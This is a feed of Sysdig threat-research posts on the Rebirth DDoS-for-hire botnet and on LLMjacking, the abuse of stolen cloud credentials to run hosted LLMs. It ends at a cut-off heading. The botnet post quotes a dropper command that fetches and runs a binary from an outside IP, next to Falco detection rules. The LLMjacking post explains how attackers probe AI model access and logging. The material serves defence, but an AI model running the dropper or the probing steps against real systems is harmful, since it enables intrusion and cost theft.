xmrig_freebsdb04db92036547d08d1a8b40e45fb25f65329fef01cf854caa1b57e0bf5faa605
kp.sh4dc790ef83397af9d9337d10d2e926d263654772a6584354865194a1b06ce305
pkf2aef4c5f95664e88c2dd21436aa2bee4d2e7f8d32231c238e1aa407120705e4

The post CRYSTALRAY: Inside the Operations of a Rising Threat Actor Exploiting OSS Tools appeared first on Sysdig.

]]>
DDoS-as-a-Service: The Rebirth Botnet https://sysdig.com/blog/ddos-as-a-service-the-rebirth-botnet/ Tue, 28 May 2024 14:30:00 +0000 https://sysdig.com/?p=89686 In March 2024, the Sysdig Threat Research Team (TRT) began observing attacks against one of our Hadoop honeypot services from...

The post DDoS-as-a-Service: The Rebirth Botnet appeared first on Sysdig.

]]>
In March 2024, the Sysdig Threat Research Team (TRT) began observing attacks against one of our Hadoop honeypot services from the domain “rebirthltd[.]com.” Upon investigation, we discovered that the domain pertains to a mature and increasingly popular DDoS-as-a-Service botnet. The service is based on the Mirai malware family, and the operators advertise its services through Telegram and an online store (rebirthltd.mysellix[.]io). The threat actors operating the botnet are financially motivated and advertise their service primarily to the video gaming community, although there is no evidence that this botnet is not being purchased beyond gaming-related purposes, and organizations may still be at risk of falling victim to these botnets attacks. In this article, we will take a detailed look at how this group operates from a business and technical point of view. 

RebirthLtd

At the core of the RebirthLtd’s business is its DDoS botnet, which is rented out to whomever is willing to pay. The botnet’s current capabilities include:

 • tcpbypass : Spoofed + raw TCP bypass attack.
 • ovhtcp : Spoofed TCP complex flood.
 • tcptfo : Spoofed TCP TFO floods.
 • handshake : Spoofed + raw handshake connections flood.
 • tcpreflect : Spoofed TCP packets reflected attack auto bypass geoblock.
 • tcprst : raw TCP RST packets terminate connections.
 • udpbypass : udp bypass raw flood.
 • socket : socket layer raw + spoof flood.
 • gamep : high spoofed + raw packets flood.
 • udpflood : raw UDP packets flood.
 • ackflood : raw TCP ACK packets flood.
 • synflood : raw TCP SYN packets flood.
 • wraflood : tcp raw handshake flood.

RebirthLtd offers its services through a variety of packages listed on a web-based storefront that has been registered since August 2022. The cheapest plan, for which a buyer can purchase a subscription and immediately receive access to the botnet’s services, is priced at $15. The basic plan seems to only include access to the botnet’s executables and limited functionalities in terms of available number of infected clients. More expensive plans include API access, C2 servers availability, and improved features, such as the number of attacks per second that can be launched.

rebirth botnet

The botnet’s main services seem to be targeting video game streamers for financial gain, as its Telegram channel claims that RebirthHub (another moniker for the botnet, along with RebirthLtd) is capable of “hitting almost all types of game servers.”

rebirth botnet

The Telegram channel was created in April 2023, but the first message advertising the Rebirth botnet was posted at the end of January 2024. Regular updates are posted every few days. At the time of writing, there were approximately 200 subscribers.

The botnet seems to be monitored by a DDoS monitoring website, tumult.network, where it appears in the top 5 rankings as the fifth-most prolific botnet for total requests sent, presumably, to flood targets.

Tumult is an emerging resource, which acts like the Yellow Pages or Craigslist for DDoS services. Over the past few years, the site has grown due to the ease of setting up malicious operations, for example, because Mirai’s source code itself is freely available. Multiple botnet buildkit tools have been observed, as analyzed by Imperva. There is a lucrative market for customers who are willing to pay a small fee to sublease infected devices and carry out malicious operations, protected by the anonymity that the botmasters are able to provide with services such as Rebirth. For the botmasters, who were previously associated with hacking groups, this has facilitated the illicit monetization of their technical skills. 

Learn How To Prevent DDoS Attacks

Motivations

In the Telegram channel, this botnet claims to be capable of “hitting almost all types of game servers,” and we found that most of the Rebirth botnet users are targeting video game streamers for financial gain.

DDoS in the gaming industry seems to be an increasingly common issue. With a botnet such as Rebirth, an individual is able to DDoS the game server or other players in a live game, either causing games to glitch and slow down or other players’ connections to lag or crash. The individual then appears to be more skilled than the rest. This may be financially motivated for users of streaming services such as Twitch, whose business model relies on a streaming player gaining followers; this essentially provides a form of income through the monetization of a broken game.

Our hypothesis for the increase in gaming DDoS is corroborated by the findings we have gathered on the individuals responsible for the development and maintenance of the botnet.

Another use case for buyers of the Rebirth botnet is “DDoS trolling.” Also known as “stresser trolling,” this phenomenon is also quite prevalent in the gaming community, as it involves the use of botnets to launch DDoS attacks against gaming servers. The attacks in question aim to disrupt the gaming experience of legitimate players, flooding the server with an overwhelming amount of traffic and rendering it inaccessible or causing severe lags.

Attribution

Threat Group Members

The leader of Rebirth seems to be an individual called “CazzG” on Telegram, but this username was not present in the channel bio at the time of writing. Upon further analysis, we identified the username CazzG listed separately as both the support admin and CEO for another botnet called “estresse.pro.” Furthermore, there is a possibility this user is Chinese. We found Chinese advertisements in the channel which said to contact CazzG for purchase. In a Telegram channel for the Tsuki botnet, which is also advertised in the Rebirth channel, we also found that CazzG’s username displays a Chinese flag. Finally, we identified other monikers for this individual during our research including “Elliot,” “rootkit ty,” and “R00TK.”

The Telegram channel for the stresse.pro botnet does not seem active anymore, and the last message posted concerns the actual sale of the botnet.

We believe a German-speaking individual by the username of “Docx69” on Telegram, and “prixnuke” on TikTok and YouTube, is also a Rebirth botnet administrator and advocate. They frequently upload videos on TikTok of their streaming sessions for video games “Call of Duty: Warzone,” often with a disclaimer that a “Nuke Service” is available for purchase in a private, invitation only Discord server “shop4youv2.” We made a direct correlation with the Rebirth botnet because of a YouTube video that was circulated in the Telegram channel claiming that the botnet can cause lags to one of the gaming servers hosting Warzone. The video itself is an advertisement for the Rebirth botnet.

rebirth botnet
Link to YT “prixnuke” video
rebirth botnet
Docx69 on TikTok under the moniker “prixnuke”

The domain shop4youv2.de was part of an FBI takedown operation named “Operation PowerOFF,” as shown below, which started in 2022 according to this article.

rebirth botnet

An ELF Digest report we found identifies the domain as spreading Mirai malware, whose C2 was IPv4 93[.]123[.]85[.]149. According to AlienVault, this IP hosted at some point the domain “tsuki.army,” which is the domain used to advertise a secondary botnet within the Rebirth Telegram channel.

Learn How To Prevent DDoS Attacks

Malware Family

As is the case with many botnet and malware variants, Rebirth is the culmination of multiple well-known malware families. While investigating related previous campaigns, we found this tweet from May 2020 that included a detailed analysis of a malware that was named by the author as “Rebirth” and “Vulcan.” 

From a November 2020 analysis on VirusTotal, the Rebirth/Vulcan malware family for this DDoS botnet was not labeled as Mirai, but as its own family known as Rebirth. It was described as a botnet built off Gafgyt but specifically made to target IoT devices. According to the author, the malware also inherited some capabilities from known families QBot and STDBot, also incorporating known exploits. 

We are very confident that these old findings are early evolutions of the Rebirth DDoS botnet attacks we see now. Campaigns prior to August 2022 were likely the Rebirth leaders or affiliated members, whereas attacks following the advertisement of Rebirth as a DDoS-as-a-service botnet likely include buyers.

Learn How To Prevent DDoS Attacks

Campaigns

Early Campaigns

Digging further into the initial Rebirth botnet findings dating back to 2019, we found several technical details confirming the current RebirthLtd botnet-for-hire is the same. The tweet below shows variants circulating under executable names “rebirth”. The files from 2019 are still available in VT.

The payload from the tweet resembles the bash scripts we have collected from recent botnet attacks.

Payload from Twitter
Payload collected

Recent Campaigns

The Rebirth botnet has been quite active since its initial advertisement on Telegram this year. It is less likely that these recent attacks are the Rebirth founders and developers, but rather other users who have purchased the botnet capability. Attribution can get quite convoluted in for-sale and for-hire instances.

Rebirth botnet attacks are being actively identified and reported by others as well, as seen here. However, the C2 identified as rebirthbot[.]icu is now dead. In an earlier attack, on Feb. 11, 2024, Fox_threatintel tweeted several details, including the same bash scripts we identified. As shown below, this campaign was associated with “Stresse.Pro,” which we identified above as related to the founder of Rebirth. Another interesting part of this attack analysis is the correlation with an APT group called “rEAL l33t hxors,” for which we have not found further evidence.

rebirth botnet

We also received attacks to our honeypots from three other domains associated with the Rebirth botnet:

  • Yoshiproxy[.]ltd
  • Yosh[.]ltd
  • yoshservices[.]ltd


We found evidence that the domain “yosh.ltd” had previously executed Rebirth attacks in September 2023. During triage, we found the associated domain “blkyosh.com.” Telemetry in VirusTotal reveals that these attacks have already been detected in a number of countries: Spain, United States, Ireland, and Germany.

Infection Methods

The malicious ELFs are spread on a target system by downloading and executing a bash script, whose code remains the same in all campaigns. The filename and executable names are changed according to either the campaign or a given vulnerability exploited. For example, one of the scripts we collected is named after the Ruckus Wireless Admin software which was, at some point, vulnerable to CVE-2023-25717. We believe that the naming convention corresponds to the malware compatibility for a given target system, where certain bots are deployed according to either a vulnerable service or simply for architecture compatibility. For example, in this case below, once the attackers find a vulnerable Ruckus software, they deploy the specific compatible botnet variant.

The script follows the same structure:

  • It attempts to change the directory (cd) to several locations such as /tmp, /var/run, /mnt, and /root. This is likely an attempt to navigate to common directories where temporary files or system files might be stored.
  • It then attempts to download multiple files from a remote server using wget. These files have names like rebirth.mips, rebirth.mpsl, rebirth.sh4, etc.
  • After downloading each file, it sets execute permissions (chmod +x) and executes them (./filename). These files are then removed (rm -rf) after execution.

A second variant of the bash script pipes the malicious retrieval and execution of the ELF files into busybox, using the following command:

cd /usr; rm -rf mpsl ; /bin/busybox wget http://194.169.175.43/mpsl; chmod 777 mpsl ; ./mpsl lillin; cd /usr; rm

This may be a recent introduction that aims to minimize detection risks by taking advantage of the many busybox built-in commands. This finding also corroborates the previous evidence of Rebirth we found, where the payloads are different according to whether the target runs the busybox suite. At the time of writing, we have collected 11 bash scripts, available here.

Learn How To Prevent DDoS Attacks

Tool Arsenal

We were able to retrieve 137 Rebirth executables, which are bundled by the attackers according to the campaign and run by inputting a prefix (e.g., original ELFarm4” is labeled “l1arm4,” “k1arm4”). 

Some of them have no detections on VirusTotal and were not submitted prior to our investigations. At the time of writing, we have found 90 undetected variants, for which a list of IoCs is available here.

Dynamic Analysis

Upon execution of a random sample of undetected variants we collected, we were able to establish that these variants seem akin to previously documented Gafgyt samples given the methods used, such as relying on the prctl syscall to mask its process name to /bin/bash

These samples in particular all conclude their execution by echoing “RebirthLTD.”

It is interesting to note that the executables are set with specific commands to start, for example, “$1” or “ntel.” Otherwise, they do not seem to perform the same operations.

rebirth botnet

The optional argument could serve as a mechanism for remote control or command injection, as attackers may use this feature to remotely issue commands to infected devices, instructing them to perform specific actions or download and execute additional payloads. This can also make the malware behavior less predictable and harder to analyze, as attackers have incorporated randomness or variability into the execution process. Hence, had we not fully obtained the initial payload (bash script) containing the correct arguments for the given ELFs, we may have not been able to capture the malware’s behavior.

Investigating with our Sysdig captures, we observed the following:

The malware performs a large number of read operations on the /proc/net/tcp file, one byte at a time. The tcp file provides information about active network connections on the host. Rebirth may be attempting to scan for further vulnerable devices by reading /proc/net/tcp or similar files, with the objective of identifying open ports and potential targets for infection.

It then performs socket creation and binding to the local address addresses on a specific port “8345,” which suggests that the program is setting up a network listener. In the case of Rebirth, this could be the malware setting up a command and control server to receive commands from the attacker or to coordinate with other infected devices in the botnet.

This variant also sets socket options to manipulate the behavior of network connections, such as enabling the reuse of addresses to facilitate rapid propagation and evasion of detection.

It then concludes its execution by creating a fork, in this case to further carry out malicious operations such as scanning for vulnerable devices and launching distributed denial-of-service (DDoS) attacks.

Detection

The prctl system call is commonly used to control various aspects of a process’s behavior. One specific option, PR_SET_NAME, can be used to assign a name to a process, which can be useful for debugging purposes. However, this feature can be abused by malicious actors to obfuscate the true nature of a process or to impersonate legitimate processes, as we have observed with the Rebirth malware. In our case, the prctl syscall was used to set the process name as /bin/bash to evade detection by security tools. 

rebirth botnet

This system call is leveraged by various tools, so we are providing an example limited to programs executed from a suspicious location, such as /tmp. Falco can be used to detect the use of Rebirth in the runtime using a custom rule and a default one that can detect the starting execution of Rebirth at runtime, but you can also modify or craft new ones if you want to improve the detection.

- rule: Suspicious Process Impersonation
  desc: Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign.
  condition: evt.type=prctl and evt.dir=< and evt.arg.option="PR_SET_NAME" and (proc.exepath contains "/tmp" or proc.exepath contains "/shm")
  exceptions:
  outputs: Process invoked name change from suspicious location (proc.exepath=%proc.exepath evt.args=%evt.args proc.pname=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline user.name=%user.name user.loginuid=%user.loginuid proc.tty=%proc.tty proc.cmdline=%proc.cmdline proc.pcmdline=%proc.pcmdline gcmdline=%proc.acmdline[2] container.id=%container.id container_name=%container.name proc.pid=%proc.pid proc.cwd=%proc.cwd image=%container.image.repository:%container.image.tag evt.args=%evt.args)
  priority: WARNING
  tags: [host, container, process]

Rebirth and other Linux malware is often run from the “/tmp” directory. This directory is backed by memory and not stored on the hard drive, making it harder to find with forensics. Any executions from temporary directories should be reviewed. 

- rule: Execution from /tmp
  desc: This rule detects file execution from the /tmp directory, a common tactic for threat actors to stash their readable+writable+executable files.
  condition: spawned_process and (proc.exepath startswith "/tmp/" or (proc.name in (shell_binaries) and proc.args startswith "/tmp/")) and not pip_venv_tmp 
  exceptions:
  output: File execution detected from /tmp by process %proc.name with parent %proc.pname on %container.name under user %user.name with cmdline %proc.cmdline (proc.cmdline=%proc.cmdline connection=%fd.name user.name=%user.name proc.name=%proc.name proc.pname=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] user.loginuid=%user.loginuid container.id=%container.id evt.type=%evt.type evt.res=%evt.res proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid proc.exepath=%proc.exepath user.uid=%user.uid user.loginname=%user.loginname group.gid=%group.gid group.name=%group.name container.name=%container.name image=%container.image.repository)
  priority: WARNING

Conclusion

The release of the Mirai source code in 2017 and the advent of cryptocurrency has created an entire new industry around offering botnets for Denial of Service services. Rebirth shows the continued evolution of this business model as they become more sophisticated on the commercial-side while also taking advantage of the current boom in CVEs. 

No matter the motivation of the users, these services will continue to present a threat to all networks and reinforce the need for good security hygiene. Organizations do not want to find themselves as part of these botnets as it will result in degraded performance, increased costs, and possibly reputational damage. Proactive vulnerability management and real-time runtime threat detection are two effective ways of dealing with threats like a Rebirth botnet DDoS. 

The post DDoS-as-a-Service: The Rebirth Botnet appeared first on Sysdig.

]]>
LLMjacking: Stolen Cloud Credentials Used in New AI Attack https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/ Mon, 06 May 2024 18:02:09 +0000 https://sysdig.com/?p=88386 The Sysdig Threat Research Team (TRT) recently observed a new attack that leveraged stolen cloud credentials in order to target...

The post LLMjacking: Stolen Cloud Credentials Used in New AI Attack appeared first on Sysdig.

]]>
The Sysdig Threat Research Team (TRT) recently observed a new attack that leveraged stolen cloud credentials in order to target ten cloud-hosted large language model (LLM) services, known as LLMjacking. The credentials were obtained from a popular target, a system running a vulnerable version of Laravel (CVE-2021-3129). Attacks against LLM-based Artificial Intelligence (AI) systems have been discussed often, but mostly around prompt abuse and altering training data. In this case, attackers intend to sell LLM access to other cybercriminals while the cloud account owner pays the bill.

Once initial access was obtained, they exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers: in this instance, a local Claude (v2/v3) LLM model from Anthropic was targeted. If undiscovered, this type of attack could result in over $46,000 of LLM consumption costs per day for the victim.

Sysdig researchers discovered evidence of a reverse proxy for LLMs being used to provide access to the compromised accounts, suggesting a financial motivation.  However, another possible motivation is to extract LLM training data. 

Breadth of Targets

We were able to discover the tools that were generating the requests used to invoke the models during the attack. This revealed a broader script that was able to check credentials for ten different AI services in order to determine which were useful for their purposes. These services include:

  • AI21 Labs, Anthropic, AWS Bedrock, Azure, ElevenLabs, MakerSuite, Mistral, OpenAI, OpenRouter, and GCP Vertex AI

The attackers are looking to gain access to a large amount of LLM models across different services. No legitimate LLM queries were actually run during the verification phase. Instead, just enough was done to figure out what the credentials were capable of and any quotas. In addition, logging settings are also queried where possible. This is done to avoid detection when using the compromised credentials to run their prompts.

Background

Hosted LLM Models

All major cloud providers, including Azure Machine Learning, GCP’s Vertex AI, and AWS Bedrock, now host large language model (LLM) services. These platforms provide developers with easy access to various popular models used in LLM-based AI. As illustrated in the screenshot below, the user interface is designed for simplicity, enabling developers to start building applications quickly.

These models, however, are not enabled by default. Instead, a request needs to be submitted to the cloud vendor in order to run them. For some models, it is an automatic approval; for others, like third-party models, a small form must be filled out. Once a request is made, the cloud vendor usually enables access pretty quickly. The requirement to make a request is often more of a speed bump for attackers rather than a blocker, and shouldn’t be considered a security mechanism. 

Cloud vendors have simplified the process of interacting with hosted cloud-based language models by using straightforward CLI commands. Once the necessary configurations and permissions are in place, you can easily engage with the model using a command similar to this:

aws bedrock-runtime invoke-model –model-id anthropic.claude-v2 –body ‘{“prompt”: “\n\nHuman: story of two dogs\n\nAssistant:”, “max_tokens_to_sample” : 300}’  –cli-binary-format raw-in-base64-out  invoke-model-output.txt

LLM Reverse Proxy

The key checking code that verifies if credentials are able to use targeted LLMs also makes reference to another project: OAI Reverse Proxy. This open source project acts as a reverse proxy for LLM services. Using software such as this would allow an attacker to centrally manage access to multiple LLM accounts while not exposing the underlying credentials, or in this case, the underlying pool of compromised credentials. During the attack using the compromised cloud credentials, a user-agent that matches OAI Reverse Proxy was seen attempting to use LLM models.

LLM Jacking Attack

The image above is an example of an OAI Reverse Proxy we found running on the Internet. There is no evidence that this instance is tied to this attack in any way, but it does show the kind of information it collects and displays. Of special note are the token counts (“tookens”), costs, and keys which are potentially logging.

LLMJacking Attack

This example shows an OAI reverse proxy instance, which is setup to use multiple types of LLMs. There is no evidence that this instance is involved with the attack. 

If the attackers were gathering an inventory of useful credentials and wanted to sell access to the available LLM models, a reverse proxy like this could allow them to monetize their efforts.

LLMJacking Attack

Technical Analysis

In this technical breakdown, we explore how the attackers navigated a cloud environment to carry out their intrusion. By employing seemingly legitimate API requests within the cloud environment, they cleverly tested the boundaries of their access without immediately triggering alarms. The example below demonstrates a strategic use of the InvokeModel API call logged by CloudTrail. Although the attackers issued a valid request, they intentionally set the max_tokens_to_sample parameter to -1. This unusual parameter, typically expected to trigger an error, instead served a dual purpose. It confirmed not only the existence of access to the LLMs but also that these services were active, as indicated by the resulting ValidationException. A different outcome, such as an AccessDenied error, would have suggested restricted access. This subtle probing reveals a calculated approach to uncover what actions their stolen credentials permitted within the cloud account.

InvokeModel

The InvokeModel call is logged by CloudTrail and an example malicious event can be seen below. They sent a legitimate request but specified “max_tokens_to_sample” to be -1. This is an invalid error which causes the “ValidationException” error, but it is useful information for the attacker to have because it tells them the credentials have access to the LLMs and they have been enabled. Otherwise, they would have received an “AccessDenied” error.

{

    "eventVersion": "1.09",

    "userIdentity": {

        "type": "IAMUser",

        "principalId": "[REDACTED]",

        "arn": "[REDACTED]",

        "accountId": "[REDACTED]",

        "accessKeyId": "[REDACTED]",

        "userName": "[REDACTED]"

    },

    "eventTime": "[REDACTED]",

    "eventSource": "bedrock.amazonaws.com",

    "eventName": "InvokeModel",

    "awsRegion": "us-east-1",

    "sourceIPAddress": "83.7.139.184",

    "userAgent": "Boto3/1.29.7 md/Botocore#1.32.7 ua/2.0 os/windows#10 md/arch#amd64 lang/python#3.12.1 md/pyimpl#CPython cfg/retry-mode#legacy Botocore/1.32.7",

    "errorCode": "ValidationException",

    "errorMessage": "max_tokens_to_sample: range: 1..1,000,000",

    "requestParameters": {

        "modelId": "anthropic.claude-v2"

    },

    "responseElements": null,

    "requestID": "d4dced7e-25c8-4e8e-a893-38c61e888d91",

    "eventID": "419e15ca-2097-4190-a233-678415ed9a4f",

    "readOnly": true,

    "eventType": "AwsApiCall",

    "managementEvent": true,

    "recipientAccountId": "[REDACTED]",

    "eventCategory": "Management",

    "tlsDetails": {

        "tlsVersion": "TLSv1.3",

        "cipherSuite": "TLS_AES_128_GCM_SHA256",

        "clientProvidedHostHeader": "bedrock-runtime.us-east-1.amazonaws.com"

    }

}

Example Cloudtrail log

AWS Bedrock is not supported in all regions so the attackers called “InvokeModel” only in the supported regions. At this time, Bedrock is supported in us-east-1, us-west-2, ap-southeast-1, ap-northeast-1, eu-central-1, eu-west-3, and us-gov-west-1, as shown here. Different models are available depending on the region; here is the list of models supported by AWS Region.

GetModelInvocationLoggingConfiguration

Interestingly, the attackers showed interest in how the service was configured. This can be done by calling “GetModelInvocationLoggingConfiguration,” which returns S3 and Cloudwatch logging configuration if enabled. In our setup, we used both S3 and Cloudwatch to gather as much data about the attack as possible. 

{

    "loggingConfig": {

        "cloudWatchConfig": {

            "logGroupName": "[REDACTED]",

            "roleArn": "[REDACTED]",

            "largeDataDeliveryS3Config": {

                "bucketName": "[REDACTED]",

                "keyPrefix": "[REDACTED]"

            }

        },

        "s3Config": {

            "bucketName": "[REDACTED]",

            "keyPrefix": ""

        },

        "textDataDeliveryEnabled": true,

        "imageDataDeliveryEnabled": true,

        "embeddingDataDeliveryEnabled": true

    }

}

Example GetModelInvocationLoggingConfiguration response

Information about the prompts being run and their results are not stored in Cloudtrail. Instead, additional configuration needs to be done to send that information to Cloudwatch and S3. This check is done to hide the details of their activities from any detailed observations. OAI Reverse Proxy states it will not use any AWS key that has logging enabled for the sake of “privacy.” This makes it impossible to inspect the prompts and responses if they are using the AWS Bedrock vector.

Impact

In an LLMjacking attack, the damage comes in the form of increased costs to the victim. It shouldn’t be surprising to learn that using an LLM isn’t cheap and that cost can add up very quickly. Considering the worst-case scenario where an attacker abuses Anthropic Claude 2.x and reaches the quota limit in multiple regions, the cost to the victim can be over $46,000 per day.

According to the pricing and the initial quota limit for Claude 2:

  • 1000 input tokens cost $0.008, 1000 output tokens cost $0.024.
  • Max 500,000 input and output tokens can be processed per minute according to AWS Bedrock. We can consider the average cost between input and output tokens, which is $0.016 for 1000 tokens.

Leading to the total cost: (500K tokens/1000 * $0.016) * 60 minutes * 24 hours * 4 regions = $46,080 / day

By maximizing the quota limits, attackers can also block the compromised organization from using models legitimately, disrupting business operations.

Detection

The ability to detect and respond swiftly to potential threats can make all the difference in maintaining a robust defense. Drawing insights from recent feedback and industry best practices, we’ve distilled key strategies to elevate your detection capabilities:

  • Cloud Logs Detections: Tools like Falco, Sysdig Secure, and CloudWatch Alerts are indispensable allies. Organizations can proactively identify suspicious behavior by monitoring runtime activity and analyzing cloud logs, including reconnaissance tactics such as those employed within AWS Bedrock. 
  • Detailed Logging: Comprehensive logging, including verbose logging, offers invaluable visibility into the inner workings of your cloud environment. Verbose information about model invocations and other critical activities gives organizations a nuanced understanding about activity in their cloud environments. 

Cloud Log Detections

Monitoring cloud logs can reveal suspicious or unauthorized activity. Using Falco or Sysdig Secure, the reconnaissance methods used during the attack can be detected, and a response can be started. For Sysdig Secure customers, this rule can be found in the Sysdig AWS Notable Events policy.

Falco rule:

- rule: Bedrock Model Recon Activity

  desc: Detect reconaissance attempts to check if Amazon Bedrock is enabled, based on the error code. Attackers can leverage this to discover the status of Bedrock, and then abuse it if enabled.

    condition: jevt.value[/eventSource]="bedrock.amazonaws.com" and jevt.value[/eventName]="InvokeModel" and jevt.value[/errorCode]="ValidationException"

    output: A reconaissance attempt on Amazon Bedrock has been made (requesting user=%aws.user, requesting IP=%aws.sourceIP, AWS region=%aws.region, arn=%jevt.value[/userIdentity/arn], userAgent=%jevt.value[/userAgent], modelId=%jevt.value[/requestParameters/modelId])

    priority: WARNING

In addition, CloudWatch alerts can be configured to handle suspicious behaviors. Several runtime metrics for Bedrock can be monitored to trigger alerts.

Detailed Logging

Monitoring your organization’s use of language model (LLM) services is crucial, and various cloud vendors provide facilities to streamline this process. This typically involves setting up mechanisms to log and store data about model invocations.

For AWS Bedrock specifically, users can leverage CloudWatch and S3 for enhanced monitoring capabilities. CloudWatch can be set up by creating a log group and assigning a role with the necessary permissions. Similarly, to log into S3, a designated bucket is required as a destination. It is important to note that the CloudTrail log of the InvokeModel command does not capture details about the prompt input and output. However, Bedrock settings allow for easy activation of model invocation logging. Additionally, for model input or output data larger than 100kb or in binary format, users must explicitly specify an S3 destination to handle large data delivery. This includes input and output images, which are stored in the logs as Base64 strings. Such comprehensive logging mechanisms ensure that all aspects of model usage are monitored and archived for further analysis and compliance.

The logs contain additional information about the tokens processed, as shown in the following example:

{

    "schemaType": "ModelInvocationLog",

    "schemaVersion": "1.0",

    "timestamp": "[REDACTED]",

    "accountId": "[REDACTED]",

    "identity": {

        "arn": "[REDACTED]"

    },

    "region": "us-east-1",

    "requestId": "bea9d003-f7df-4558-8823-367349de75f2",

    "operation": "InvokeModel",

    "modelId": "anthropic.claude-v2",

    "input": {

        "inputContentType": "application/json",

        "inputBodyJson": {

            "prompt": "\n\nHuman: Write a story of a young wizard\n\nAssistant:",

            "max_tokens_to_sample": 300

        },

        "inputTokenCount": 16

    },

    "output": {

        "outputContentType": "application/json",

        "outputBodyJson": {

            "completion": " Here is a story about a young wizard:\n\nMartin was an ordinary boy living in a small village. He helped his parents around their modest farm, tending to the animals and working in the fields. [...] Martin's favorite subject was transfiguration, the art of transforming objects from one thing to another. He mastered the subject quickly, amazing his professors by turning mice into goblets and stones into fluttering birds.\n\nMartin",

            "stop_reason": "max_tokens",

            "stop": null

        },

        "outputTokenCount": 300

    }

}

Example S3 log

Recommendations

This attack could have been prevented in a number of ways, including:

  • Vulnerability management to prevent initial access.
  • Secrets management to ensure credentials are not stored in the clear where they can be stolen.
  • CSPM/CIEM to ensure the abused account had the least amount of permissions it needed.

As highlighted by recent research, cloud vendors offer a range of tools and best practices designed to mitigate the risks of cloud attacks. These tools help organizations build and maintain a secure cloud environment from the outset.

For instance, AWS provides several robust security measures. The AWS Security Reference Architecture outlines best practices for securely constructing your cloud environment. Additionally, AWS recommends using Service Control Policies (SCP) to centrally manage permissions, which helps minimize the risk associated with over-permissioned accounts that could potentially be abused. These guidelines and tools are part of AWS’s commitment to enhancing security and providing customers with the resources to protect their cloud infrastructure effectively. Other cloud vendors offer similar frameworks and tools, ensuring that users have access to essential security measures to safeguard their data and services regardless of the platform.

Conclusion

Stolen cloud and SaaS credentials continue to be a common attack vector. This trend will only increase in popularity as attackers learn all of the ways they can leverage their new access for financial gain. The use of LLM services can be expensive, depending on the model and the amount of tokens being fed to it. Normally, this would cause a developer to try and be efficient — sadly, attackers do not have the same incentive. Detection and response is critical to deal with any issues quickly. 

IoCs

IP Addresses

83.7.139.184

83.7.157.76

73.105.135.228

83.7.135.97

The post LLMjacking: Stolen Cloud Credentials Used in New AI Attack appeared first on Sysdig.

]]>
Meet the Research behind our Threat Research Team https://sysdig.com/blog/sysdig-threat-research-team-rsa-2024/ Fri, 26 Apr 2024 15:30:00 +0000 https://sysdig.com/?p=88470 The Sysdig Threat Research Team (TRT)  is on a mission to help secure innovation at cloud speeds. A group of...

The post Meet the Research behind our Threat Research Team appeared first on Sysdig.

]]>
The Sysdig Threat Research Team (TRT)  is on a mission to help secure innovation at cloud speeds.

A group of some of the industry’s most elite threat researchers, the Sysdig TRT discovers and educates on the latest cloud-native security threats, vulnerabilities, and attack patterns.

We are fiercely passionate about security and committed to the cause. Stay up to date here on the latest insights, trends to monitor, and crucial best practices for securing your cloud-native environments. Or come meet us at RSA; we’ll be at booth S-742.

Below we will detail the latest research that has been carried out and how we have improved the security ecosystem.

SSH-SNAKE

SSH-Snake  is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network. The worm automatically searches through known credential locations and shell history files to determine its next move. SSH-Snake is actively being used by threat actors in offensive operations. 

Sysdig TRT uncovered the command and control (C2) server of threat actors deploying SSH-Snake. This server holds a repository of files containing the output of SSH-Snake for each of the targets they have gained access to. 

Filenames found on the C2 server contain IP addresses of victims, which allowed us to make a high confidence assessment that these threat actors are actively exploiting known Confluence vulnerabilities in order to gain initial access and deploy SSH-Snake. This does not preclude other exploits from being used, but many of the victims are running Confluence.  

Output of SSH-Snake contains the credentials found, the IPs of the targets, and the bash history of the victims. We are witnessing the victim list growing, which means that this is an ongoing operation. At the time of writing, the number of victims is approximately 300.

RUBYCARP

Sysdig TRT discovered a long-running botnet operated by a Romanian threat actor group, which we are calling RUBYCARP. Evidence suggests that this threat actor has been active for at least 10 years. Its primary method of operation leverages a botnet deployed using a variety of public exploits and brute force attacks. This group communicates via public and private IRC networks, develops cyber weapons and targeting data, and uses its botnet for financial gain via cryptomining and phishing. This report explores how RUBYCARP operates and its motivations.

RUBYCARP, like many threat actors, is interested in payloads that enable financial gain. This includes cryptomining, DDoS, and Phishing. We have seen it deploy a number of different tools to monetize its compromised assets. For example, through its Phishing operations, RUBYCARP has been seen targeting credit cards.

SCARLETEEL

SCARLETEEL, a complex operation discovered in 2023, continues to thrive. Cloud environments are still their primary target, but the tools and techniques used have adapted to bypass new security measures, along with a more resilient and stealthy command and control architecture. AWS Fargate, a more sophisticated environment to breach, has also become a target as their new attack tools allow them to operate within that environment.

The attack graph discovered by this group is the following: 

Compromise AWS accounts through exploiting vulnerable compute services, gain persistence, and attempt to make money using cryptominers. Had we not thwarted their attack, our conservative estimate is that their mining would have cost over $4,000 per day until stopped.

We know that they are not only after cryptomining, but stealing intellectual property as well. In their recent attack, the actor discovered and exploited a customer mistake in an AWS policy which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to then do with it what they wanted. We also watched them target Kubernetes in order to significantly scale their attack.

AMBERSQUID

Keeping with the cloud threats, The Sysdig TRT has uncovered a novel cloud-native cryptojacking operation which they’ve named AMBERSQUID. This operation leverages AWS services not commonly used by attackers, such as AWS Amplify, AWS Fargate, and Amazon SageMaker. The uncommon nature of these services means that they are often overlooked from a security perspective, and the AMBERSQUID operation can cost victims more than $10,000/day.

The AMBERSQUID operation was able to exploit cloud services without triggering the AWS requirement for approval of more resources, as would be the case if they only spammed EC2 instances. Targeting multiple services also poses additional challenges, like incident response, since it requires finding and killing all miners in each exploited service.

We discovered AMBERSQUID by performing an analysis of over 1.7M Linux images in order to understand what kind of malicious payloads are hiding in the containers images on Docker Hub.

This dangerous container image didn’t raise any alarms during static scanning for known indicators or malicious binaries. It was only when the container was run that its cross-service cryptojacking activities became obvious. This is consistent with the findings of our 2023 Cloud Threat Report, in which we noted that 10% of malicious images are missed by static scanning alone.

MESON NETWORK

